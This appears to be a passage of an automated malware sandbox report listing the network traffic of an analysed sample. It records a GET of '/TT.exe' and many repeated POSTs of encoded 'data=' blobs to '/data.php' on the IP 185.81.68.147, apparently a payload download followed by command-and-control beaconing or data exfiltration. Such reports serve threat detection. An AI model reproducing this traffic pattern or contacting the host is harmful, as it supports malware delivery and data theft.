data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
      Source: global trafficHTTP traffic detected: GET /TT.exe HTTP/1.1User-Agent: Mozilla/5.0Host: 185.81.68.147Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 133Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72 Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 133Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72 Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 49Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 133Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72 Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 49Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 133Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72 Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 49Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 49Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 133Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72 Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 49Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 133Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72 Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 49Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 133Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72 Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 49Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 133Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72 Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 49Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 49Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 133Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72 Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 49Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 133Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72 Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 49Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 133Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72 Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 49Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 49Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 133Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72 Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 49Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 133Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72 Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 49Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 133Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72 Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 49Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 133Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72 Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 49Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 49Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
